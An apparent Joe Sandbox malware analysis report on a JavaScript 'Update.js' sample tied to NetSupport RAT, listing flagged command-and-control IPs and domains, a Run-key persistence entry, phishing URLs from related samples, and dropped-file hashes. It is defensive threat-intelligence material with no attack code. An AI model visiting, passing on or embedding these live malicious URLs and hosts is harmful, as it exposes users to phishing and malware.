                                      https://www-googleapis-staging.sandbox.google.comwscript.exe, 00000000.00000003.2210442052.000001D0CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213461332.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2160355900.000001D0C75F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2208938952.000001D0CCCC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211630069.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155218710.000001D0C7F22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213566215.000001D0CD192000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209113379.000001D0CD044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212871998.000001D0CD187000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215778459.000001D0CD30A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210931576.000001D0CD168000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214379787.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210203440.000001D0CD043000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213173128.000001D0CD182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214676945.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211789508.000001D0CD18A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210554221.000001D0CD16D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211353920.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213694902.000001D0CD040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215259651.000001D0CD30D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212052812.000001D0CD046000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://%s/fakeurl.htmclient32.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      79.141.161.172
                                      		ipva2024-detransp.comBulgaria
                                      		202015HZ-US-ASBGtrue
                                      5.181.159.137
                                      		unknownMoldova Republic of
                                      		39798MIVOCLOUDMDtrue
                                      104.26.1.231
                                      		geo.netsupportsoftware.comUnited States
                                      		13335CLOUDFLARENETUSfalse
                                      8.39.147.104
                                      		moneymoj.comUnited States
                                      		54024CFA-INSTITUTEUStrue

                                      Private

                                      IP
                                      127.0.0.1

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1508730
                                      Start date and time:2024-09-10 16:32:40 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 11s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:19
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • GSI enabled (Javascript)
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Update.js
                                      Detection:MAL
                                      Classification:mal100.rans.troj.expl.evad.winJS@9/27@3/5
                                      EGA Information:
                                      • Successful, ratio: 66.7%
                                      HCA Information:
                                      • Successful, ratio: 77%
                                      • Number of executed functions: 163
                                      • Number of non-executed functions: 202
                                      Cookbook Comments:
                                      • Found application associated with file extension: .js

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
                                      • Execution Graph export aborted for target powershell.exe, PID 5880 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: Update.js

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      10:33:41API Interceptor2x Sleep call for process: wscript.exe modified
                                      10:33:45API Interceptor42x Sleep call for process: powershell.exe modified
                                      10:34:05API Interceptor2x Sleep call for process: svchost.exe modified
                                      10:34:21API Interceptor5966774x Sleep call for process: client32.exe modified
                                      16:33:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CJYJHX C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                      16:34:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CJYJHX C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.26.1.231FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                      • geo.netsupportsoftware.com/location/loca.asp
                                      Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                      • geo.netsupportsoftware.com/location/loca.asp
                                      Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                      • geo.netsupportsoftware.com/location/loca.asp
                                      SAPConcur.msixGet hashmaliciousNetSupport RATBrowse
                                      • geo.netsupportsoftware.com/location/loca.asp
                                      HQuxVxuLV.ps1Get hashmaliciousNetSupport RATBrowse
                                      • geo.netsupportsoftware.com/location/loca.asp
                                      Advanced Scanner.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                      • geo.netsupportsoftware.com/location/loca.asp
                                      R6aeFGF7gU.exeGet hashmaliciousNetSupport RATBrowse
                                      • geo.netsupportsoftware.com/location/loca.asp
                                      SecureClientInstaller.exeGet hashmaliciousNetSupport RATBrowse
                                      • geo.netsupportsoftware.com/location/loca.asp
                                      RECH31683168.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                      • geo.netsupportsoftware.com/location/loca.asp
                                      IN___502HUSMW9N.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                      • geo.netsupportsoftware.com/location/loca.asp

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      geo.netsupportsoftware.comFakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                      • 104.26.1.231
                                      FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                      • 172.67.68.212
                                      Update_2762895.msixGet hashmaliciousNetSupport RATBrowse
                                      • 104.26.1.231
                                      Update_9025289.msixGet hashmaliciousNetSupport RATBrowse
                                      • 172.67.68.212
                                      JbZaDxFXF3.exeGet hashmaliciousNetSupport RATBrowse
                                      • 172.67.68.212
                                      update.jsGet hashmaliciousNetSupport RATBrowse
                                      • 104.26.1.231
                                      Update_6529495.msixGet hashmaliciousNetSupport RATBrowse
                                      • 172.67.68.212
                                      Update_7053228.msixGet hashmaliciousNetSupport RATBrowse
                                      • 104.26.1.231
                                      Update_5289856.msixGet hashmaliciousNetSupport RATBrowse
                                      • 104.26.0.231
                                      updates.jsGet hashmaliciousNetSupport RATBrowse
                                      • 104.26.0.231

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      HZ-US-ASBGhttp://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                      • 185.33.84.157
                                      http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                      • 185.33.84.157
                                      http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                      • 185.33.84.157
                                      http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                      • 185.33.84.157
                                      https://gift-card-granny10.myfreesites.net/Get hashmaliciousUnknownBrowse
                                      • 79.141.162.99
                                      Invoices.lnkGet hashmaliciousUnknownBrowse
                                      • 79.141.160.37
                                      Payment_Document.lnkGet hashmaliciousUnknownBrowse
                                      • 79.141.160.37
                                      http://soursejone.com/21dca2f7d5837c09f5.jsGet hashmaliciousUnknownBrowse
                                      • 79.141.160.71
                                      http://soursejone.com/21dca2f7d58337c09f5.jsGet hashmaliciousUnknownBrowse
                                      • 79.141.160.71
                                      TradingView_setup_IIS.msiGet hashmaliciousUnknownBrowse
                                      • 79.141.160.2
                                      MIVOCLOUDMDZWlwrTM9HK.exeGet hashmaliciousRemcosBrowse
                                      • 5.181.156.117
                                      Gez0dmj6yl.exeGet hashmaliciousDCRatBrowse
                                      • 94.158.244.70
                                      update.jsGet hashmaliciousNetSupport RATBrowse
                                      • 5.181.159.28
                                      17E503AEF3804C0513838FB4AE3E00F323B1260BF753D99DBF0AE415BA54DE11.exeGet hashmaliciousBdaejec, RaccoonBrowse
                                      • 194.180.191.241
                                      updates.jsGet hashmaliciousNetSupport RATBrowse
                                      • 194.180.191.69
                                      updates.jsGet hashmaliciousNetSupport RATBrowse
                                      • 94.158.245.103
                                      Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                      • 94.158.245.103
                                      yvM2XCEkGj.exeGet hashmaliciousRaccoon Stealer v2Browse
                                      • 5.181.159.42
                                      updates.jsGet hashmaliciousNetSupport RATBrowse
                                      • 94.158.245.103
                                      xUtQLCJLoN.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      • 94.158.244.72
                                      CFA-INSTITUTEUSx.png.ps1Get hashmaliciousUnknownBrowse
                                      • 8.39.147.42
                                      https://theproduct4you.world/intl/ceci/compl?bhu=CWrKCaLj5Ayfkh9dn499SsEHPRZrHr3s6unAeGet hashmaliciousGRQ ScamBrowse
                                      • 8.39.147.66
                                      https://bit.ly/38hpiGZGet hashmaliciousGRQ ScamBrowse
                                      • 8.39.147.66
                                      https://www.google.com/url?q=HTtPs%3A%2F%2Fd4in.biz%2FB%2Fy37wdgGc%2F&sa=D&sntz=1&usg=AOvVaw23mPMwVDo_hCPOwg36j5uMGet hashmaliciousGRQ ScamBrowse
                                      • 8.39.147.66
                                      https://www.google.com/url?nm=50474786114&is=48890006478&q=HTtPS%3A%2F%2F5t0%2Eeu%2F%2FkzemIpal&sa=D&ow=93357825083&usg=AFQjCNFG2qeqRwQRyCL9KwlLye4amkHqXwGet hashmaliciousGRQ ScamBrowse
                                      • 8.39.147.66
                                      https://www.google.com/url?q=htTPS%3A%2F%2F5t0%2Eeu%2F%2FM8r3Cpal&sa=D&ec=95051242740&xy=630753628150&lr=84642&usg=AFQjCNEaoXBGbdEApxUsZdyALpKRLW0ZbAGet hashmaliciousGRQ ScamBrowse
                                      • 8.39.147.66
                                      https://bit.ly/3KifMRCGet hashmaliciousUnknownBrowse
                                      • 8.39.147.66
                                      Qf3znUYo2b.dllGet hashmaliciousCobaltStrikeBrowse
                                      • 8.39.147.87
                                      Qf3znUYo2b.dllGet hashmaliciousCobaltStrikeBrowse
                                      • 8.39.147.87
                                      VtnLEsR9lB.exeGet hashmaliciousCobaltStrikeBrowse
                                      • 8.39.147.87
                                      CLOUDFLARENETUShttps://www.tiktok.com/////link/v2?aid=1988&lang=enitcl&scene=bio_url&target=google.com.////amp/s/%E2%80%8Breid%C2%ADopur%C2%ADificador%E2%80%8B.%E2%80%8Bc%C2%ADom.b%C2%ADr//////xone1/xdwvp/YWxhbi5yYW5kQGdjdWJlLWluc3VyYW5jZS5jb20=$%E3%80%82Get hashmaliciousHTMLPhisherBrowse
                                      • 1.1.1.1
                                      SecuriteInfo.com.BackDoor.AgentTeslaNET.34.20128.22369.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      https://www.tiktok.com/////link/v2?aid=1988&lang=enqiwk&scene=bio_url&target=google.com.////amp/s/%E2%80%8Breid%C2%ADopur%C2%ADificador%E2%80%8B.%E2%80%8Bc%C2%ADom.b%C2%ADr//////xone1/ljknb/dGhvbWFzLmhvZXNlQGFkdmFudC1iZWl0ZW4uY29t$%E3%80%82Get hashmaliciousHTMLPhisherBrowse
                                      • 1.1.1.1
                                      cmd.exeGet hashmaliciousUnknownBrowse
                                      • 104.21.82.93
                                      https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bc%C2%ADt%C2%ADh%E2%80%8B.%C2%ADv%C2%ADn/.dev/JCE6X4BH/cnVzc2VsbEBhZGtjcmVkaXR1bmlvbi5jb20==$%E3%80%82Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                      • 104.26.0.100
                                      Invoice Request.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.12.205
                                      https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/cth.vn/.dev/JCE6X4BH/cnVzc2VsbEBhZGtjcmVkaXR1bmlvbi5jb20==$%E3%80%82Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                      • 104.26.0.100
                                      https://dev-childcareorverify.pantheonsite.io/?email=amy.matter.er@zylstrahd.comGet hashmaliciousHTMLPhisherBrowse
                                      • 172.67.74.59
                                      Voicemail Transcription.(387.KB).htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 104.22.50.98
                                      inquiry#1523.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.BackDoor.AgentTeslaNET.34.20128.22369.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 79.141.161.172
                                      Invoice Request.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      • 79.141.161.172
                                      rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                      • 79.141.161.172
                                      https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bva%C2%ADnd%C2%ADat%C2%ADco%E2%80%8B.%C2%ADv%C2%ADn/.dev/ChZuQF9L/bHlubi5wYXJzb25zQGltYWdvLmNvbW11bml0eQ===$%E3%80%82Get hashmaliciousHTMLPhisherBrowse
                                      • 79.141.161.172
                                      doc_Zapytanie - Oferta KH 09281.com.exeGet hashmaliciousQuasarBrowse
                                      • 79.141.161.172
                                      https://go.skimresources.com/?id=129857X1600501&url=https://www.freelancer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/298cfa06-ad24-42db-8a85-7a3ca069b2cf?j=eyJ1IjoiNGRnZ2x2In0.IkG1h6SLHR3lrFyuGet hashmaliciousHTMLPhisherBrowse
                                      • 79.141.161.172
                                      https://dl9r8y25t98wv.cloudfront.net/?YS50YW5ndXlAc2JtLm1jGet hashmaliciousUnknownBrowse
                                      • 79.141.161.172
                                      MALED_Q88_10.09.24.doc.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      • 79.141.161.172
                                      HelperLibrary.ps1Get hashmaliciousUnknownBrowse
                                      • 79.141.161.172
                                      Q88_MT Carol 2024.09.10.doc.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      • 79.141.161.172
                                      a0e9f5d64349fb13191bc781f81f42e1cmd.exeGet hashmaliciousUnknownBrowse
                                      • 8.39.147.104
                                      https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bc%C2%ADt%C2%ADh%E2%80%8B.%C2%ADv%C2%ADn/.dev/JCE6X4BH/cnVzc2VsbEBhZGtjcmVkaXR1bmlvbi5jb20==$%E3%80%82Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                      • 8.39.147.104
                                      760l5F2ZjJ.exeGet hashmaliciousLummaCBrowse
                                      • 8.39.147.104
                                      94dzpnhjR1.exeGet hashmaliciousLummaCBrowse
                                      • 8.39.147.104
                                      760l5F2ZjJ.exeGet hashmaliciousLummaCBrowse
                                      • 8.39.147.104
                                      94dzpnhjR1.exeGet hashmaliciousLummaCBrowse
                                      • 8.39.147.104
                                      ow1qWm38w1.exeGet hashmaliciousLummaCBrowse
                                      • 8.39.147.104
                                      jWKQJMmB86.exeGet hashmaliciousLummaCBrowse
                                      • 8.39.147.104
                                      d4EtjTNPAr.exeGet hashmaliciousLummaCBrowse
                                      • 8.39.147.104
                                      ow1qWm38w1.exeGet hashmaliciousLummaCBrowse
                                      • 8.39.147.104

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLLupdate.jsGet hashmaliciousNetSupport RATBrowse
                                        updates.jsGet hashmaliciousNetSupport RATBrowse
                                          updates.jsGet hashmaliciousNetSupport RATBrowse
                                            Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                              updates.jsGet hashmaliciousNetSupport RATBrowse
                                                Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                  Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                    MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse
                                                      update.jsGet hashmaliciousNetSupport RATBrowse
                                                        Update_122.0.616.jsGet hashmaliciousNetSupport RATBrowse
                                                          C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLLupdate.jsGet hashmaliciousNetSupport RATBrowse
                                                            updates.jsGet hashmaliciousNetSupport RATBrowse
                                                              updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                  updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                      Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                        MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse
                                                                          update.jsGet hashmaliciousNetSupport RATBrowse
                                                                            Update_122.0.616.jsGet hashmaliciousNetSupport RATBrowse

                                                                              Created / dropped Files

                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.7263033904029493
                                                                              Encrypted:false
                                                                              SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0+:9JZj5MiKNnNhoxuH
                                                                              MD5:93E6A3E595855460E10A72458B030DCE
                                                                              SHA1:49F08CC6ECB4705DF3F7DE4012071737829A6817
                                                                              SHA-256:EBA0B93C6BE5C6D8AE5351AF7B1542DC945DFF80AAFB08D70D8D9C86DE4E679F
                                                                              SHA-512:55C3D35111CEB8729CADE4523321BD9994CE05003B238F548FFFAC3945E7B0488D37151A37826D4069C0D45180CBDD4AC24BDC21A2AAC9AA2DFE2DF57C87E203
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:Extensible storage user DataBase, version 0x620, checksum 0x9570f4e0, page size 16384, DirtyShutdown, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.7556297983600244
                                                                              Encrypted:false
                                                                              SSDEEP:1536:VSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:VazaSvGJzYj2UlmOlOL
                                                                              MD5:DB0DBAEFBA2C9F333A75241BF664B05A
                                                                              SHA1:91F0752FE9C590DA2D1707FC37A4169A6701C35B
                                                                              SHA-256:C504AE6054A046F0C3E20B34424C2CCFFC2557A4409FD2C353C166DE239098A3
                                                                              SHA-512:4AA6214B708C3A2FBE32DCE0B3A00D7A05EC30958EB26AC57803B104307B0AEADAB7C4A29710F712CE31A7BDA3E6A5E7A1ADE0391DE5CED6AD684B433D43CE21
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.p..... .......7.......X\...;...{......................0.e......!...{?.."...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...................................d..."...|..................u.."...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):0.07922460318656788
                                                                              Encrypted:false
                                                                              SSDEEP:3:jSXKYeXLD3rfNaAPaU1lZUlXalluxmO+l/SNxOf:jyKzXLXNDPaUh5gmOH
                                                                              MD5:EC3A7C6A11B83ED0297B887E852A6D5E
                                                                              SHA1:9CF305E164D244837DDBEBD55ADE450A8521B751
                                                                              SHA-256:0151490FEA985FF9ED4E08A1CE90D971923080868001C20784CCEDA82715B408
                                                                              SHA-512:BDF1D9E3560D58AA2617981723336647F63C35F18ABF868C6D664674E491A1C20BEA48149B871DA206066B6AD46ACB4AAFB0D0CF5761A1A8DDE7283D940B2130
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:........................................;...{..."...|...!...{?..........!...{?..!...{?..g...!...{?.................u.."...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loca[1].htm

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:modified
                                                                              Size (bytes):16
                                                                              Entropy (8bit):3.077819531114783
                                                                              Encrypted:false
                                                                              SSDEEP:3:llD:b
                                                                              MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                              SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                              SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                              SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:40.7357,-74.1724

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1524
                                                                              Entropy (8bit):5.3897992647355615
                                                                              Encrypted:false
                                                                              SSDEEP:24:3eNn4SKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNmwr8HJYBlD3RB+j:ONn4SU4y4RQmFoUeCamfm9qr9tK8Nfm3
                                                                              MD5:8093ED5A8BD161DBC783038513DB52C7
                                                                              SHA1:C3FD9CAC1FA5B642C8A0726C978AB8617C8306B0
                                                                              SHA-256:F79F5290CE1CD9FA2E512A1835CFFC07179BF4A8CD57F18EC039A78C1398BAA4
                                                                              SHA-512:CB4827675C4822593FED7E57DF1BF63CF9A1BF40343E7EEBD53B3A07E0D8FC722888522528BF006B6D9765710258398F7871BE4AB49C943A61A1FD6D574B1551
                                                                              Malicious:false
                                                                              Preview:@...e...........8.....................X..............@..........H...............x..}...@..."~.u....... .System.IO.Compression.FileSystemH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Ut

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0olerwg.b0i.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ornsgalj.st3.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\CXCC.zip

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                              Category:dropped
                                                                              Size (bytes):2435615
                                                                              Entropy (8bit):7.9975270710717625
                                                                              Encrypted:true
                                                                              SSDEEP:49152:a51Zl4lEDThXBJOhHvh6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRRakTSU:E15FXa/hRFY89YYc9jh23redpmQROe
                                                                              MD5:C02C379AC353594F487B91AE840DC635
                                                                              SHA1:215FAF9E51AEF87FE8BA456C107AB2C8CC1900D2
                                                                              SHA-256:1EBB8AF9F86B32FB9CC3AADE92EC4AD4426207F49009236D7CF88990CF7F79E5
                                                                              SHA-512:65EC9B57608D1C456CD788302CFA64F8085004BDB72AF38B4B1EDAA1D694D919617A9F0430DE61EE0D649AACE52E506DD2498D040FA140CF7AADFB3ED9247EF9
                                                                              Malicious:false
